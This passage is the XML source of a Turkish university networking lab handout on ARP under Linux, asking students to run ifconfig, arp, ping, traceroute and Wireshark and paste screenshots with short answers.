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947" w:rsidRPr="00A23947" w:rsidRDefault="0097714C" w:rsidP="00BE55C0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BLGM455 Güz</w:t>
      </w:r>
      <w:r w:rsidR="00A23947">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A23947" w:rsidRPr="00A23947">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2019-2020</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005619CE" w:rsidRPr="00A23947" w:rsidRDefault="005619CE" w:rsidP="00BE55C0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A23947">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab </w:t>
      </w:r>
      <w:r w:rsidR="004646EB" w:rsidRPr="00A23947">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00A23947">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0097714C">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux’ta ARP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E55134" w:rsidRDefault="00A23947" w:rsidP="00BE55C0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Alexander Chefranov </w:t>
      </w:r>
      <w:r w:rsidR="000F2CFA">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tarafından 24 Nisan </w:t>
      </w:r>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2019</w:t>
      </w:r>
      <w:r w:rsidR="000F2CFA">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">’da hazırlandı. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E55134" w:rsidRDefault="00E55134" w:rsidP="00BE55C0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E55134">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Tansel Sarıhan tarafından 27 Ekim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2019 tarihinde düzenlendi</w:t>
      </w:r>
      <w:r w:rsidRPr="00E55134">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A23947" w:rsidRPr="0097714C" w:rsidRDefault="00D80BAD" w:rsidP="00BE55C0">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Samet R</w:t>
      </w:r>
      <w:r w:rsidR="00E55134">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eyhanlı tarafından 28</w:t>
      </w:r>
      <w:r w:rsidR="000F2CFA">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ekim 2019’da Türkçeye çevrildi.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00792E22" w:rsidRDefault="00792E22" w:rsidP="00A23947">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000F2CFA" w:rsidRDefault="0097714C" w:rsidP="00A23947">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Aşağıda verilen ekran görüntülerine ve açıklamalara göre, grup başına iki bilgisayarda</w:t>
      </w:r>
      <w:r w:rsidR="000F2CFA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F2CFA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">adım </w:t>
      </w:r>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="000F2CFA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">’den </w:t>
      </w:r>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="000F2CFA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’a kadar bir seri deney</w:t>
      </w:r>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> gerçekleştireceksiniz. Dene</w:t>
      </w:r>
      <w:r w:rsidR="000F2CFA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>yl</w:t>
      </w:r>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>erinizin ekran görüntüleri aşağıda belirtilen met</w:t>
      </w:r>
      <w:r w:rsidR="000F2CFA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nin</w:t>
      </w:r>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000F2CFA" w:rsidRPr="000F2CFA">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[Buraya Yerleştirin …</w:t>
      </w:r>
      <w:r w:rsidR="000F2CFA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">] kısmına </w:t>
      </w:r>
      <w:r w:rsidR="000F2CFA" w:rsidRPr="000F2CFA">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">yerleştirilecektir. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0097714C" w:rsidRDefault="000F2CFA" w:rsidP="00A23947">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Deney 9’da </w:t>
      </w:r>
      <w:r w:rsidR="0097714C" w:rsidRPr="0097714C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, ARP isteği ve ARP yanıtı için Ethernet ve ARP çerçevelerini doldurun</w:t>
      </w:r>
      <w:r w:rsidR="0097714C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A0356A" w:rsidRPr="00A92244" w:rsidRDefault="0097714C" w:rsidP="0097714C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Raporlama için Ek 1'de verilen kapak sayfasını kullanın ve 8 Kasım</w:t>
      </w:r>
      <w:r w:rsidR="000F2CFA">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2019, Cuma günü </w:t>
      </w:r>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>16.30</w:t>
      </w:r>
      <w:r w:rsidR="00802CCA">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">’a kadar Labın koordinatör asistanına </w:t>
      </w:r>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rapor ve CD</w:t>
      </w:r>
      <w:r w:rsidR="00802CCA">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>’nizi teslim edin</w:t>
      </w:r>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0097714C" w:rsidRDefault="0097714C" w:rsidP="0097714C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003205A5" w:rsidRDefault="00802CCA" w:rsidP="0097714C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Adım 1’den 9’a kadar olan deneyler</w:t>
      </w:r>
      <w:r w:rsidR="0097714C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aşağıda b</w:t>
      </w:r>
      <w:r w:rsidR="0097714C" w:rsidRPr="0097714C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>elirtilmiştir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0097714C" w:rsidRDefault="0097714C" w:rsidP="0097714C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BC1A05" w:rsidRDefault="00BC1A05" w:rsidP="00BC1A05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC1A05">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00802CCA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A92244" w:rsidRDefault="00A92244" w:rsidP="00A92244">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr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5760720" cy="3575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onfig_arp_125_240420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1A" w:rsidRDefault="0097714C" w:rsidP="00291B1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Buraya </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>çin bir ekran görüntüsü ekleyin.</w:t>
      </w:r>
      <w:r w:rsidR="00291B1A" w:rsidRPr="00291B1A">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291B1A" w:rsidRPr="003A46FC" w:rsidRDefault="00802CCA" w:rsidP="00291B1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Soru: İki bilgisayarın</w:t>
      </w:r>
      <w:r w:rsidR="0097714C" w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> IPv4 ve MAC adresleri</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nedir</w:t>
      </w:r>
      <w:r w:rsidR="0097714C" w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC1A05" w:rsidRPr="00802CCA" w:rsidRDefault="00802CCA" w:rsidP="00BC1A05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>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="00BC1A05" w:rsidRPr="00802CCA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A92244" w:rsidRDefault="00A92244" w:rsidP="00A92244">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr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 wp14:anchorId="48641A0F" wp14:editId="434894BB">
            <wp:extent cx="5760720" cy="3575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onfig_arp_125_240420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1A" w:rsidRDefault="0097714C" w:rsidP="00291B1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[Buraya ARP tablosu için bir ekran görüntüsü ekleyin]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00291B1A" w:rsidRPr="003A46FC" w:rsidRDefault="00802CCA" w:rsidP="00291B1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Soru: Burada </w:t>
      </w:r>
      <w:r w:rsidR="0097714C" w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> kaç </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">tane host </w:t>
      </w:r>
      <w:r w:rsidR="0097714C" w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>var?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A46FC" w:rsidRDefault="003A46FC" w:rsidP="00291B1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BC1A05" w:rsidRPr="00802CCA" w:rsidRDefault="00BC1A05" w:rsidP="00BC1A05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802CCA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ping</w:t>
      </w:r>
      <w:r w:rsidR="003A46FC" w:rsidRPr="00802CCA">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A92244" w:rsidRDefault="00A92244" w:rsidP="00A92244">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr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5760720" cy="3575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g_arp_125_2404201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1A" w:rsidRDefault="00291B1A" w:rsidP="00291B1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291B1A">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="0097714C" w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Buraya Ping için bir ekran görüntüsü ekleyin]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0097714C" w:rsidRDefault="0097714C" w:rsidP="003A46FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">İki bilgisayarı pingleyin, ARP tablosunu tekrar kontrol edin </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003A46FC" w:rsidRDefault="003A46FC" w:rsidP="003A46FC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291B1A">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="0097714C" w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ping sonrası ARP tablosu için bir ekran görüntüsü ekleyin]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007277C7" w:rsidRDefault="007277C7" w:rsidP="00291B1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007277C7" w:rsidRPr="003504E8" w:rsidRDefault="00D97525" w:rsidP="007277C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003504E8">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Tr</w:t>
      </w:r>
      <w:r w:rsidR="007277C7" w:rsidRPr="003504E8">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aceroute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009656B5" w:rsidRDefault="009656B5" w:rsidP="009656B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:noProof/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5760720" cy="41001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eroute_125_2404201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C7" w:rsidRDefault="007277C7" w:rsidP="007277C7">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291B1A">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="003504E8">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Buraya </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="003504E8" w:rsidRPr="00704DC1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:i/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>www.google.com’a</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="003504E8">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> yapılan </w:t>
      </w:r>
      <w:r w:rsidR="0097714C" w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003504E8">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Traceroute</w:t>
      </w:r>
      <w:r w:rsidR="003504E8" w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003504E8">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0097714C" w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>için bir ekran görüntüsü ekleyin]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007277C7" w:rsidRPr="007277C7" w:rsidRDefault="007277C7" w:rsidP="007277C7">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00291B1A" w:rsidRDefault="00291B1A" w:rsidP="00291B1A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BC1A05" w:rsidRDefault="00BC1A05" w:rsidP="00BC1A0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Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D0B27" w:rsidRDefault="001D0B27" w:rsidP="001D0B27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Launch: sudo wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC1A05" w:rsidRDefault="00BC1A05" w:rsidP="00BC1A05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr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5760720" cy="32531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esharkstart1904202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E8" w:rsidRDefault="00511CE8" w:rsidP="00511CE8">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291B1A">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="0097714C" w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Buraya Wireshark l</w:t>
      </w:r>
      <w:r w:rsidR="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>aunch</w:t>
      </w:r>
      <w:r w:rsidR="0097714C" w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> için bir ekran görüntüsü ekleyin]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00511CE8" w:rsidRDefault="00511CE8" w:rsidP="00BC1A05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BC1A05" w:rsidRPr="003504E8" w:rsidRDefault="0097714C" w:rsidP="00BC1A05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3504E8">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Arp Filtreleme</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D0B27" w:rsidRDefault="001D0B27" w:rsidP="001D0B27">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>In Filter field: arp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BC1A05" w:rsidRDefault="00D303EB" w:rsidP="00BC1A05">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr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5760720" cy="32531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Preq1904202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4C" w:rsidRPr="0097714C" w:rsidRDefault="0097714C" w:rsidP="0097714C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>[Buraya ARP İsteği</w:t>
      </w:r>
      <w:r w:rsidR="003504E8">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(request)</w:t>
      </w:r>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> için bir ekran görüntüsü ekleyin]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00511CE8" w:rsidRDefault="0097714C" w:rsidP="0097714C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0097714C">
        <w:rPr>
          <w:b/>
          <w:i/>
